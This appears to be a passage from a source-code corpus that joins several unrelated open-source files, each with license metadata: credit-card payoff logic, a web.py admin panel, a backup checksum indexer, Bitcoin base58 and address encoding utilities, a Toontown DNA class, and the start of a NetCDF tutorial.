min_sum = sum([s.minimum_payment for s in statements])
if min_sum > max_total:
raise TypeError(
'ERROR: Max total payment of %s is less than sum of minimum '
'payments (%s)' % (max_total, min_sum)
)
min_bal = Decimal('+Infinity')
min_idx = None
for idx, stmt in enumerate(statements):
if stmt.principal < min_bal:
min_bal = stmt.principal
min_idx = idx
res = [None for _ in statements]
min_pay = max_total - (
min_sum - statements[min_idx].minimum_payment
)
for idx, stmt in enumerate(statements):
if idx == min_idx:
res[idx] = min_pay
else:
res[idx] = statements[idx].minimum_payment
return res
class LowestInterestRateFirstMethod(_PayoffMethod):
"""
Pay statements off from lowest to highest interest rate.
"""
description = 'Lowest to Highest Interest Rate'
show_in_ui = True
def find_payments(self, statements):
"""
Given a list of statements, return a list of payment amounts to make
on each of the statements.
:param statements: statements to pay, list of :py:class:`~.CCStatement`
:type statements: list
:return: list of payment amounts to make, same order as ``statements``
:rtype: list
"""
max_total = self.max_total_for_period(statements[0].billing_period)
min_sum = sum([s.minimum_payment for s in statements])
if min_sum > max_total:
raise TypeError(
'ERROR: Max total payment of %s is less than sum of minimum '
'payments (%s)' % (max_total, min_sum)
)
min_apr = Decimal('+Infinity')
min_idx = None
for idx, stmt in enumerate(statements):
if stmt.apr < min_apr:
min_apr = stmt.apr
min_idx = idx
res = [None for _ in statements]
min_pay = max_total - (
min_sum - statements[min_idx].minimum_payment
)
for idx, stmt in enumerate(statements):
if idx == min_idx:
res[idx] = min_pay
else:
res[idx] = statements[idx].minimum_payment
return res
def calculate_payoffs(payment_method, statements):
"""
Calculate the number of billing periods and total amount of money required
to pay off the cards associated with the given list of statements. Return a
list of (`int` number of billing periods, `decimal.Decimal` amount paid,
`decimal.Decimal` first payment amount) tuples for each item in
`statements`.
:param payment_method: method used for calculating payment amount to make
on each statement; subclass of _PayoffMethod
:type payment_method: _PayoffMethod
:param statements: list of :py:class:`~.CCStatement` objects to pay off.
:type statements: list
:return: list of (`int` number of billing periods, `decimal.Decimal`
amount paid, `decimal.Decimal` first payment amount) tuples for each item
in `statements`
:rtype: list
"""
def unpaid(s): return [x for x in s.keys() if s[x]['done'] is False]
payoffs = {}
logger.debug(
'calculating payoff via %s for: %s', payment_method, statements
)
for idx, stmt in enumerate(statements):
payoffs[stmt] = {
'months': 0, 'amt': Decimal('0.0'), 'idx': idx, 'done': False,
'next_pymt_amt': None
}
while len(unpaid(payoffs)) > 0:
u = unpaid(payoffs)
to_pay = payment_method.find_payments(u)
for stmt, p_amt in dict(zip(u, to_pay)).items():
if stmt.principal <= Decimal('0'):
payoffs[stmt]['done'] = True
continue
if stmt.principal <= p_amt:
payoffs[stmt]['done'] = True
payoffs[stmt]['months'] += 1 # increment months
payoffs[stmt]['amt'] += stmt.principal
if payoffs[stmt]['next_pymt_amt'] is None:
payoffs[stmt]['next_pymt_amt'] = stmt.principal
continue
payoffs[stmt]['months'] += 1 # increment months
payoffs[stmt]['amt'] += p_amt
if payoffs[stmt]['next_pymt_amt'] is None:
payoffs[stmt]['next_pymt_amt'] = p_amt
new_s = stmt.pay(Decimal('-1') * p_amt)
payoffs[new_s] = payoffs[stmt]
del payoffs[stmt]
res = []
for s in sorted(payoffs, key=lambda x: payoffs[x]['idx']):
tmp = (
payoffs[s]['months'],
payoffs[s]['amt'],
payoffs[s]['next_pymt_amt']
)
if payoffs[s]['next_pymt_amt'] is None:
tmp = (
payoffs[s]['months'],
payoffs[s]['amt'],
Decimal('0.0')
)
res.append(tmp)
return res
class CCStatement(object):
"""
Represent a credit card statement (one billing period).
"""
def __init__(self, interest_cls, principal, min_payment_cls, billing_period,
transactions={}, end_balance=None, interest_amt=None):
"""
Initialize a CCStatement for the given billing period.
:param interest_cls: Interest calculation method
:type interest_cls: _InterestCalculation
:param principal: starting principal for this billing period
:type principal: decimal.Decimal
:param min_payment_cls: Minimum payment calculation method
:type min_payment_cls: _MinPaymentFormula
:param billing_period: Billing period
:type billing_period: _BillingPeriod
:param transactions: transactions applied during this statement. Dict
of :py:class:`datetime.date` to :py:class:`decimal.Decimal`.
:type transactions: dict
:param end_balance: the ending balance of the statement, if known. If
not specified, this value will be calculated.
:type end_balance: decimal.Decimal
:param interest_amt: The amount of interest charged this statement. If
not specified, this value will be calculated.
:type interest_amt: decimal.Decimal
"""
if not isinstance(billing_period, _BillingPeriod):
raise TypeError(
'billing_period must be an instance of _BillingPeriod'
)
self._billing_period = billing_period
if not isinstance(interest_cls, _InterestCalculation):
raise TypeError(
'interest_cls must be an instance of _InterestCalculation'
)
self._interest_cls = interest_cls
if not isinstance(min_payment_cls, _MinPaymentFormula):
raise TypeError(
'min_payment_cls must be an instance of _MinPaymentFormula'
)
self._min_pay_cls = min_payment_cls
self._orig_principal = principal
self._min_pay = None
self._transactions = transactions
self._principal = end_balance
self._interest_amt = interest_amt
if end_balance is None or interest_amt is None:
res = self._interest_cls.calculate(
principal, self._billing_period.start_date,
self._billing_period.end_date, self._transactions
)
if end_balance is None:
self._principal = res['end_balance']
if interest_amt is None:
self._interest_amt = res['interest_paid']
def __repr__(self):
return '<CCStatement(interest_cls=%s principal=%s min_payment_cls=%s ' \
'transactions=%s end_balance=%s ' \
'interest_amt=%s start_date=%s end_date=%s)>' % (
self._interest_cls, self._orig_principal, self._min_pay_cls,
self._transactions, self._principal,
self._interest_amt, self.start_date, self.end_date
)
@property
def principal(self):
return self._principal
@property
def billing_period(self):
"""
Return the Billing Period for this statement.
:return: billing period for this statement
:rtype: _BillingPeriod
"""
return self._billing_period
@property
def interest(self):
return self._interest_amt
@property
def start_date(self):
return self._billing_period.start_date
@property
def end_date(self):
return self._billing_period.end_date
@property
def apr(self):
return self._interest_cls.apr
@property
def minimum_payment(self):
"""
Return the minimum payment for the next billing cycle.
:return: minimum payment for the next billing cycle
:rtype: decimal.Decimal
"""
return self._min_pay_cls.calculate(
self._principal, self._interest_amt
)
def next_with_transactions(self, transactions={}):
"""
Return a new CCStatement reflecting the next billing period, with the
given `transactions` applied to it.
:param transactions: dict of transactions, `datetime.date` to `Decimal`
:type transactions: dict
:return: next period statement, with transactions applied
:rtype: CCStatement
"""
return CCStatement(
self._interest_cls,
self._principal,
self._min_pay_cls,
self._billing_period.next_period,
transactions=transactions
)
def pay(self, amount):
"""
Return a new CCStatement reflecting the next billing period, with a
payment of `amount` applied to it at the middle of the period.
:param amount: amount to pay during the next statement period
:type amount: decimal.Decimal
:return: next period statement, with payment applied
:rtype: CCStatement
"""
return self.next_with_transactions({
self._billing_period.next_period.payment_date: amount
})
def subclass_dict(klass):
d = {}
for cls in klass.__subclasses__():
d[cls.__name__] = {
'description': cls.description,
'doc': cls.__doc__.strip(),
'cls': cls
}
return d
#: Dict mapping interest calculation class names to their description and
#: docstring.
INTEREST_CALCULATION_NAMES = subclass_dict(_InterestCalculation)
#: Dict mapping Minimum Payment Formula class names to their description and
#: docstring.
MIN_PAYMENT_FORMULA_NAMES = subclass_dict(_MinPaymentFormula)
#: Dict mapping Payoff Method class names to their description and docstring.
PAYOFF_METHOD_NAMES = subclass_dict(_PayoffMethod)
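# Example (hypothetical sketch, not part of biweeklybudget): projecting the
# payoff of a single $1000.00 statement using minimum payments only.
def _example_payoff():
    from datetime import date
    stmt = CCStatement(
        AdbCompoundedDaily(Decimal('0.1999')),
        Decimal('1000.00'),
        MinPaymentAmEx(),
        _BillingPeriod(date(2017, 6, 20))
    )
    # Returns [(number_of_periods, total_paid, first_payment)] for the statement.
    return calculate_payoffs(MinPaymentMethod(), [stmt])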
|
agpl-3.0
| -4,902,928,390,450,669,000
| 34.319887
| 80
| 0.587235
| false
| 4.281929
| false
| false
| false
|
rouge8/20questions
|
admin.py
|
1
|
2796
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
'''
admin.py
Andy Freeland and Dan Levy
5 June 2010
Provides administrative functions, such as retraining characters and deleting
objects and characters. Accessed at the /admin url. Laughably insecure.
'''
import web
import config, model
import twentyquestions as game
urls = (
'', 'admin',
'/', 'admin',
'/dq', 'delete_question',
'/do', 'delete_object',
'/data', 'data',
r'/retrain/(\d+)', 'retrain'
)
render = web.template.render('templates', base='base')
app = web.application(urls, locals())
class admin:
def GET(self):
'''Renders the admin page, presenting a menu of administrative functions.'''
return render.admin()
class delete_question:
def GET(self):
'''Lists all of the questions so that selected questions can be deleted.'''
questions = model.get_questions()
return render.delete_question(questions)
def POST(self):
'''Deletes selected questions and returns to the admin page.'''
question_ids = web.input()
for id in question_ids:
model.delete_question(id)
raise web.seeother('/')
class delete_object:
def GET(self):
'''Lists all of the objects so that selected objects can be deleted.'''
objects = model.get_objects()
return render.delete_object(objects)
def POST(self):
'''Deletes selected objects and returns to the admin page.'''
object_ids = web.input()
for id in object_ids:
model.delete_object(id)
raise web.seeother('/')
class data:
def GET(self):
'''Renders a page listing all of the objects so that they can be retrained.'''
objects = model.get_objects()
return render.data(list(objects))
class retrain:
def GET(self, object_id):
'''Renders a page with all of the questions and values for a specified
object_id so that it can be retrained manually.'''
object = model.get_object_by_id(object_id)
questions = model.get_questions()
data = model.get_data_dictionary()
if object:
return render.retrain(object, list(questions), data)
else:
raise web.seeother('/') # returns to admin page
def POST(self, object_id):
'''Updates object_id with the newly selected answers to questions.'''
inputs = web.input()
for question_id in inputs:
answer = inputs[question_id]
if answer in ['yes','no']:
value = getattr(game, answer) * game.RETRAIN_SCALE # STRONGLY weights values learned this way
model.update_data(object_id, question_id, value)
raise web.seeother('/data')
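# Example (hypothetical sketch): this admin sub-application is normally
# mounted under /admin by the main application; for quick standalone testing
# it could also be served with web.py's built-in server, e.g.:
#
# if __name__ == '__main__':
#     app.run()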
|
mit
| 3,521,186,683,873,155,000
| 31.511628
| 110
| 0.609084
| false
| 4.111765
| false
| false
| false
|
gunny26/webstorage
|
bin/filename_to_checksum_dict.py
|
1
|
6212
|
#!/usr/bin/python3
# pylint: disable=line-too-long
# disable=locally-disabled, multiple-statements, fixme, line-too-long
"""
command line program to create/restore/test WebStorageArchives
"""
import os
import hashlib
import datetime
import dateutil.parser
import time
import sys
import socket
import argparse
import stat
import re
import sqlite3
import logging
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG, format='%(message)s')
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
import json
import dbm
# own modules
from webstorage import WebStorageArchive as WebStorageArchive
from webstorage import FileStorageClient as FileStorageClient
class NtoM(object):
"""
Build an n-to-m (many-to-many) mapping between two key namespaces, kept in both directions.
"""
def __init__(self, keyname1, keyname2):
self.__keyname1 = keyname1
self.__keyname2 = keyname2
self.__filename = None  # filenames are passed explicitly to save() and load()
self.__data = {
self.__keyname1 : {},
self.__keyname2 : {}
}
self.__dirty = False # indicate if data is modified in memory
def add(self, **kwds):
key1 = kwds[self.__keyname1]
key2 = kwds[self.__keyname2]
if key1 in self.__data[self.__keyname1]:
if key2 not in self.__data[self.__keyname1][key1]:
self.__data[self.__keyname1][key1].add(key2)
# ignore if value is already in list
else:
self.__data[self.__keyname1][key1] = set([key2, ])
if key2 in self.__data[self.__keyname2]:
if key1 not in self.__data[self.__keyname2][key2]:
self.__data[self.__keyname2][key2].add(key1)
# ignore if value is already in list
else:
self.__data[self.__keyname2][key2] = set([key1, ])
self.__dirty = True
def save(self, filename):
"""
dump internal data to sqlite database
"""
starttime = time.time()
conn = sqlite3.connect(filename)
cur = conn.cursor()
# key 1
tablename1 = "%s_to_%s" % (self.__keyname1, self.__keyname2)
logging.debug("saving to %s", tablename1)
cur.execute("drop table if exists %s" % tablename1)
conn.commit()
cur.execute("create table if not exists %s ('%s', '%s')" % (tablename1, self.__keyname1, self.__keyname2))
for key, value in self.__data[self.__keyname1].items():
cur.execute("insert into %s values (?, ?)" % tablename1, (key, json.dumps(list(value))))
conn.commit()
# key 2
tablename2 = "%s_to_%s" % (self.__keyname2, self.__keyname1)
logging.debug("saving to %s", tablename2)
cur.execute("drop table if exists %s" % tablename2)
conn.commit()
cur.execute("create table if not exists %s ('%s', '%s')" % (tablename2, self.__keyname2, self.__keyname1))
for key, value in self.__data[self.__keyname2].items():
cur.execute("insert into %s values (?, ?)" % tablename2, (key, json.dumps(list(value))))
conn.commit()
logging.debug("save done in %0.2f s", time.time()-starttime)
logging.debug("saved %d in %s", len(self.__data[self.__keyname1]), self.__keyname1)
logging.debug("saved %d in %s", len(self.__data[self.__keyname2]), self.__keyname2)
self.__dirty = False
def load(self, filename):
"""
load internal data from a sqlite database
"""
starttime = time.time()
conn = sqlite3.connect(filename)
cur = conn.cursor()
try:
# key 1
tablename1 = "%s_to_%s" % (self.__keyname1, self.__keyname2)
for row in cur.execute("select * from %s" % tablename1).fetchall():
self.__data[self.__keyname1][row[0]] = set(json.loads(row[1]))
# key 2
tablename2 = "%s_to_%s" % (self.__keyname2, self.__keyname1)
for row in cur.execute("select * from %s" % tablename2).fetchall():
self.__data[self.__keyname2][row[0]] = set(json.loads(row[1]))
logging.debug("load done in %0.2f s", time.time()-starttime)
logging.debug("loaded %d in %s", len(self.__data[self.__keyname1]), self.__keyname1)
logging.debug("loaded %d in %s", len(self.__data[self.__keyname2]), self.__keyname2)
except sqlite3.OperationalError as exc:
logging.info("ignoring if table does not exist")
def update(filename):
conn = sqlite3.connect(filename)
cur = conn.cursor()
cur.execute("create table if not exists backupsets_done (backupset)")
myhostname = socket.gethostname()
wsa = WebStorageArchive()
backupsets = wsa.get_backupsets(myhostname)
# like wse0000107_mesznera_2016-12-06T13:48:13.400565.wstar.gz
filename_to_checksum = NtoM("absfile", "checksum")
filename_to_checksum.load(filename)
filename_to_backupset = NtoM("absfile", "backupset")
filename_to_backupset.load(filename)
backupsets_done = [row[0] for row in cur.execute("select backupset from backupsets_done").fetchall()]
for backupset in backupsets:
starttime = time.time()
#if backupset in backupsets_done:
# print(" backupset %s already done" % backupset)
# continue
hostname, tag, isoformat_ext = backupset.split("_")
isoformat = isoformat_ext[:-9]
datestring = dateutil.parser.parse(isoformat)
print(hostname, tag, dateutil.parser.parse(isoformat))
data = wsa.get(backupset)
for absfile in data["filedata"].keys():
checksum = data["filedata"][absfile]["checksum"]
filename_to_checksum.add(absfile=absfile, checksum=checksum)
filename_to_backupset.add(absfile=absfile, backupset=backupset)
# print(data["filedata"][absfile])
#cur.execute("insert into backupsets_done values (?)", (backupset,))
#conn.commit()
logging.info(" done in %0.2f s", time.time()-starttime)
filename_to_checksum.save(filename)
filename_to_backupset.save(filename)
if __name__ == "__main__":
filename = "filename_to_checksum_dict.db"
#main(filename)
update(filename)
|
gpl-2.0
| 6,207,287,639,097,450,000
| 40.139073
| 114
| 0.61027
| false
| 3.715311
| false
| false
| false
|
ionux/bitforge
|
bitforge/utils/encoding.py
|
1
|
10832
|
# -*- coding: utf-8 -*-
"""
Various utilities useful for converting one Bitcoin format to another, including some
the human-transcribable format hashed_base58.
The MIT License (MIT)
Copyright (c) 2013 by Richard Kiss
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import hashlib
from .intbytes import byte_to_int, bytes_from_int
BASE58_ALPHABET = b'123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
BASE58_BASE = len(BASE58_ALPHABET)
BASE58_LOOKUP = dict((c, i) for i, c in enumerate(BASE58_ALPHABET))
class EncodingError(Exception):
pass
def ripemd160(data):
return hashlib.new("ripemd160", data)
try:
ripemd160(b'').digest()
except Exception:
# stupid Google App Engine hashlib doesn't support ripemd160 for some stupid reason
# import it from pycrypto. You need to add
# - name: pycrypto
# version: "latest"
# to the "libraries" section of your app.yaml
from Crypto.Hash.RIPEMD import RIPEMD160Hash as ripemd160
def to_long(base, lookup_f, s):
"""
Convert an array to a (possibly bignum) integer, along with a prefix value
of how many prefixed zeros there are.
base:
the source base
lookup_f:
a function to convert an element of s to a value between 0 and base-1.
s:
the value to convert
"""
prefix = 0
v = 0
for c in s:
v *= base
try:
v += lookup_f(c)
except Exception:
raise EncodingError("bad character %s in string %s" % (c, s))
if v == 0:
prefix += 1
return v, prefix
def from_long(v, prefix, base, charset):
"""The inverse of to_long. Convert an integer to an arbitrary base.
v: the integer value to convert
prefix: the number of prefixed 0s to include
base: the new base
charset: an array indicating what printable character to use for each value.
"""
l = bytearray()
while v > 0:
try:
v, mod = divmod(v, base)
l.append(charset(mod))
except Exception:
raise EncodingError("can't convert to character corresponding to %d" % mod)
l.extend([charset(0)] * prefix)
l.reverse()
return bytes(l)
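# Added illustrative sketch (not part of the original module): round-trips a
# short byte string through to_long/from_long, showing how leading zero bytes
# are preserved via the prefix count. It only defines a helper; nothing runs on import.
def _long_roundtrip_example():
    raw = b'\x00\x00\x01\x02'
    v, prefix = to_long(256, byte_to_int, raw)
    assert (v, prefix) == (0x0102, 2)
    assert from_long(v, prefix, 256, lambda x: x) == raw
    return v, prefix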
def to_bytes_32(v):
v = from_long(v, 0, 256, lambda x: x)
if len(v) > 32:
raise ValueError("input to to_bytes_32 is too large")
return ((b'\0' * 32) + v)[-32:]
if hasattr(int, "to_bytes"):
to_bytes_32 = lambda v: v.to_bytes(32, byteorder="big")
def from_bytes_32(v):
if len(v) != 32:
raise ValueError("input to from_bytes_32 is wrong length")
return to_long(256, byte_to_int, v)[0]
if hasattr(int, "from_bytes"):
from_bytes_32 = lambda v: int.from_bytes(v, byteorder="big")
def double_sha256(data):
"""A standard compound hash."""
return hashlib.sha256(hashlib.sha256(data).digest()).digest()
def hash160(data):
"""A standard compound hash."""
return ripemd160(hashlib.sha256(data).digest()).digest()
def b2a_base58(s):
"""Convert binary to base58 using BASE58_ALPHABET. Like Bitcoin addresses."""
v, prefix = to_long(256, byte_to_int, s)
s = from_long(v, prefix, BASE58_BASE, lambda v: BASE58_ALPHABET[v])
return s.decode("utf8")
def a2b_base58(s):
"""Convert base58 to binary using BASE58_ALPHABET."""
v, prefix = to_long(BASE58_BASE, lambda c: BASE58_LOOKUP[c], s.encode("utf8"))
return from_long(v, prefix, 256, lambda x: x)
def b2a_hashed_base58(data):
"""
A "hashed_base58" structure is a base58 integer (which looks like a string)
with four bytes of hash data at the end. Bitcoin does this in several places,
including Bitcoin addresses.
This function turns data (of type "bytes") into its hashed_base58 equivalent.
"""
return b2a_base58(data + double_sha256(data)[:4])
def a2b_hashed_base58(s):
"""
If the passed string is hashed_base58, return the binary data.
Otherwise raises an EncodingError.
"""
data = a2b_base58(s)
data, the_hash = data[:-4], data[-4:]
if double_sha256(data)[:4] == the_hash:
return data
raise EncodingError("hashed base58 has bad checksum %s" % s)
def is_hashed_base58_valid(base58):
"""Return True if and only if base58 is valid hashed_base58."""
try:
a2b_hashed_base58(base58)
except EncodingError:
return False
return True
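# Added illustrative sketch (hypothetical payload, not part of the original
# module): hashed_base58 is base58(data + first four bytes of double_sha256(data)),
# so encoding, decoding and validating must agree on a round trip.
def _hashed_base58_example():
    payload = b'\x00' * 21  # hypothetical version byte plus a zeroed hash160
    encoded = b2a_hashed_base58(payload)
    assert a2b_hashed_base58(encoded) == payload
    assert is_hashed_base58_valid(encoded)
    return encoded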
def wif_to_tuple_of_prefix_secret_exponent_compressed(wif):
"""
Return a tuple of (prefix, secret_exponent, is_compressed).
"""
decoded = a2b_hashed_base58(wif)
actual_prefix, private_key = decoded[:1], decoded[1:]
compressed = len(private_key) > 32
return actual_prefix, from_bytes_32(private_key[:32]), compressed
def wif_to_tuple_of_secret_exponent_compressed(wif, allowable_wif_prefixes=[b'\x80']):
"""Convert a WIF string to the corresponding secret exponent. Private key manipulation.
Returns a tuple: the secret exponent, as a bignum integer, and a boolean indicating if the
WIF corresponded to a compressed key or not.
Not that it matters, since we can use the secret exponent to generate both the compressed
and uncompressed Bitcoin address."""
actual_prefix, secret_exponent, is_compressed = wif_to_tuple_of_prefix_secret_exponent_compressed(wif)
if actual_prefix not in allowable_wif_prefixes:
raise EncodingError("unexpected first byte of WIF %s" % wif)
return secret_exponent, is_compressed
def wif_to_secret_exponent(wif, allowable_wif_prefixes=[b'\x80']):
"""Convert a WIF string to the corresponding secret exponent."""
return wif_to_tuple_of_secret_exponent_compressed(wif, allowable_wif_prefixes=allowable_wif_prefixes)[0]
def is_valid_wif(wif, allowable_wif_prefixes=[b'\x80']):
"""Return a boolean indicating if the WIF is valid."""
try:
wif_to_secret_exponent(wif, allowable_wif_prefixes=allowable_wif_prefixes)
except EncodingError:
return False
return True
def secret_exponent_to_wif(secret_exp, compressed=True, wif_prefix=b'\x80'):
"""Convert a secret exponent (correspdong to a private key) to WIF format."""
d = wif_prefix + to_bytes_32(secret_exp)
if compressed:
d += b'\01'
return b2a_hashed_base58(d)
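# Added illustrative sketch (hypothetical toy key, not part of the original
# module): a WIF string is hashed_base58(prefix + 32-byte exponent [+ b'\x01'
# when compressed]), so encoding then decoding must return the same exponent.
def _wif_roundtrip_example():
    secret_exponent = 1  # hypothetical value; never use a toy exponent for real keys
    wif = secret_exponent_to_wif(secret_exponent, compressed=True)
    exponent, compressed = wif_to_tuple_of_secret_exponent_compressed(wif)
    assert (exponent, compressed) == (secret_exponent, True)
    return wif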
def public_pair_to_sec(public_pair, compressed=True):
"""Convert a public pair (a pair of bignums corresponding to a public key) to the
gross internal sec binary format used by OpenSSL."""
x_str = to_bytes_32(public_pair[0])
if compressed:
return bytes_from_int((2 + (public_pair[1] & 1))) + x_str
y_str = to_bytes_32(public_pair[1])
return b'\4' + x_str + y_str
def sec_to_public_pair(sec):
"""Convert a public key in sec binary format to a public pair."""
x = from_bytes_32(sec[1:33])
sec0 = sec[:1]
if sec0 == b'\4':
y = from_bytes_32(sec[33:65])
from ecdsa import is_public_pair_valid
from secp256k1 import generator_secp256k1
public_pair = (x, y)
# verify this is on the curve
if not is_public_pair_valid(generator_secp256k1, public_pair):
raise EncodingError("invalid (x, y) pair")
return public_pair
if sec0 in (b'\2', b'\3'):
from ecdsa import public_pair_for_x
from secp256k1 import generator_secp256k1
return public_pair_for_x(generator_secp256k1, x, is_even=(sec0 == b'\2'))
raise EncodingError("bad sec encoding for public key")
def is_sec_compressed(sec):
"""Return a boolean indicating if the sec represents a compressed public key."""
return sec[:1] in (b'\2', b'\3')
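# Added illustrative sketch (caller supplies a hypothetical public pair; not part
# of the original module): compressed sec is 33 bytes (0x02/0x03 + x) while
# uncompressed sec is 65 bytes (0x04 + x + y).
def _sec_length_example(public_pair):
    compressed = public_pair_to_sec(public_pair, compressed=True)
    uncompressed = public_pair_to_sec(public_pair, compressed=False)
    assert len(compressed) == 33 and is_sec_compressed(compressed)
    assert len(uncompressed) == 65 and not is_sec_compressed(uncompressed)
    return compressed, uncompressed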
def public_pair_to_hash160_sec(public_pair, compressed=True):
"""Convert a public_pair (corresponding to a public key) to hash160_sec format.
This is a hash of the sec representation of a public key, and is used to generate
the corresponding Bitcoin address."""
return hash160(public_pair_to_sec(public_pair, compressed=compressed))
def hash160_sec_to_bitcoin_address(hash160_sec, address_prefix=b'\0'):
"""Convert the hash160 of a sec version of a public_pair to a Bitcoin address."""
return b2a_hashed_base58(address_prefix + hash160_sec)
def bitcoin_address_to_hash160_sec_with_prefix(bitcoin_address):
"""
Convert a Bitcoin address back to the hash160_sec format and
also return the prefix.
"""
blob = a2b_hashed_base58(bitcoin_address)
if len(blob) != 21:
raise EncodingError("incorrect binary length (%d) for Bitcoin address %s" %
(len(blob), bitcoin_address))
if blob[:1] not in [b'\x6f', b'\0']:
raise EncodingError("incorrect first byte (%s) for Bitcoin address %s" % (blob[0], bitcoin_address))
return blob[1:], blob[:1]
def bitcoin_address_to_hash160_sec(bitcoin_address, address_prefix=b'\0'):
"""Convert a Bitcoin address back to the hash160_sec format of the public key.
Since we only know the hash of the public key, we can't get the full public key back."""
hash160, actual_prefix = bitcoin_address_to_hash160_sec_with_prefix(bitcoin_address)
if (address_prefix == actual_prefix):
return hash160
raise EncodingError("Bitcoin address %s for wrong network" % bitcoin_address)
def public_pair_to_bitcoin_address(public_pair, compressed=True, address_prefix=b'\0'):
"""Convert a public_pair (corresponding to a public key) to a Bitcoin address."""
return hash160_sec_to_bitcoin_address(public_pair_to_hash160_sec(
public_pair, compressed=compressed), address_prefix=address_prefix)
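# Added illustrative sketch (caller supplies a hypothetical public pair; not part
# of the original module): address derivation composes
# public_pair -> sec -> hash160 -> hashed_base58 with a one-byte network prefix.
def _address_pipeline_example(public_pair, compressed=True):
    sec = public_pair_to_sec(public_pair, compressed=compressed)
    h160 = hash160(sec)
    address = hash160_sec_to_bitcoin_address(h160, address_prefix=b'\0')
    assert address == public_pair_to_bitcoin_address(public_pair, compressed=compressed)
    assert bitcoin_address_to_hash160_sec(address, address_prefix=b'\0') == h160
    return address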
def is_valid_bitcoin_address(bitcoin_address, allowable_prefixes=b'\0'):
"""Return True if and only if bitcoin_address is valid."""
try:
hash160, prefix = bitcoin_address_to_hash160_sec_with_prefix(bitcoin_address)
except EncodingError:
return False
return prefix in allowable_prefixes
|
mit
| -1,994,404,400,331,621,600
| 34.631579
| 108
| 0.681961
| false
| 3.545663
| false
| false
| false
|
DedMemez/ODS-August-2017
|
dna/DNAVisGroup.py
|
1
|
2344
|
# toontown.dna.DNAVisGroup
from panda3d.core import LVector3, LVector3f
import DNAGroup
import DNABattleCell
import DNAUtil
class DNAVisGroup(DNAGroup.DNAGroup):
COMPONENT_CODE = 2
def __init__(self, name):
DNAGroup.DNAGroup.__init__(self, name)
self.visibles = []
self.suitEdges = []
self.battleCells = []
def getVisGroup(self):
return self
def addBattleCell(self, battleCell):
self.battleCells.append(battleCell)
def addSuitEdge(self, suitEdge):
self.suitEdges.append(suitEdge)
def addVisible(self, visible):
self.visibles.append(visible)
def getBattleCell(self, i):
return self.battleCells[i]
def getNumBattleCells(self):
return len(self.battleCells)
def getNumSuitEdges(self):
return len(self.suitEdges)
def getNumVisibles(self):
return len(self.visibles)
def getSuitEdge(self, i):
return self.suitEdges[i]
def getVisibleName(self, i):
return self.visibles[i]
def getVisibles(self):
return self.visibles
def removeBattleCell(self, cell):
self.battleCells.remove(cell)
def removeSuitEdge(self, edge):
self.suitEdges.remove(edge)
def removeVisible(self, visible):
self.visibles.remove(visible)
def makeFromDGI(self, dgi, dnaStorage):
DNAGroup.DNAGroup.makeFromDGI(self, dgi)
numEdges = dgi.getUint16()
for _ in xrange(numEdges):
index = dgi.getUint16()
endPoint = dgi.getUint16()
self.addSuitEdge(dnaStorage.getSuitEdge(index, endPoint))
numVisibles = dgi.getUint16()
for _ in xrange(numVisibles):
self.addVisible(DNAUtil.dgiExtractString8(dgi))
numCells = dgi.getUint16()
for _ in xrange(numCells):
w = dgi.getUint8()
h = dgi.getUint8()
x, y, z = [ dgi.getInt32() / 100.0 for i in xrange(3) ]
self.addBattleCell(DNABattleCell.DNABattleCell(w, h, LVector3f(x, y, z)))
def destroy(self):
del self.visibles[:]
del self.suitEdges[:]
del self.battleCells[:]
DNAGroup.DNAGroup.destroy(self)
|
apache-2.0
| 3,608,324,131,246,925,300
| 26.962963
| 85
| 0.611348
| false
| 3.397101
| false
| false
| false
|
CopyChat/Plotting
|
Python/PythonNetCDF.py
|
1
|
10821
|
'''
NAME
NetCDF with Python
PURPOSE
To demonstrate how to read and write data with NetCDF files using
a NetCDF file from the NCEP/NCAR Reanalysis.
Plotting using Matplotlib and Basemap is also shown.
PROGRAMMER(S)
Chris Slocum
REVISION HISTORY
20140320 -- Initial version created and posted online
20140722 -- Added basic error handling to ncdump
Thanks to K.-Michael Aye for highlighting the issue
REFERENCES
netcdf4-python -- http://code.google.com/p/netcdf4-python/
NCEP/NCAR Reanalysis -- Kalnay et al. 1996
http://dx.doi.org/10.1175/1520-0477(1996)077<0437:TNYRP>2.0.CO;2
'''
import datetime as dt # Python standard library datetime module
import numpy as np
from netCDF4 import Dataset # http://code.google.com/p/netcdf4-python/
import matplotlib.pyplot as plt
from mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid
def ncdump(nc_fid, verb=True):
'''
ncdump outputs dimensions, variables and their attribute information.
The information is similar to that of NCAR's ncdump utility.
ncdump requires a valid instance of Dataset.
Parameters
----------
nc_fid : netCDF4.Dataset
A netCDF4 dateset object
verb : Boolean
whether or not nc_attrs, nc_dims, and nc_vars are printed
Returns
-------
nc_attrs : list
A Python list of the NetCDF file global attributes
nc_dims : list
A Python list of the NetCDF file dimensions
nc_vars : list
A Python list of the NetCDF file variables
'''
def print_ncattr(key):
"""
Prints the NetCDF file attributes for a given key
Parameters
----------
key : unicode
a valid netCDF4.Dataset.variables key
"""
try:
print "\t\ttype:", repr(nc_fid.variables[key].dtype)
for ncattr in nc_fid.variables[key].ncattrs():
print '\t\t%s:' % ncattr,\
repr(nc_fid.variables[key].getncattr(ncattr))
except KeyError:
print "\t\tWARNING: %s does not contain variable attributes" % key
# NetCDF global attributes
nc_attrs = nc_fid.ncattrs()
if verb:
print "NetCDF Global Attributes:"
for nc_attr in nc_attrs:
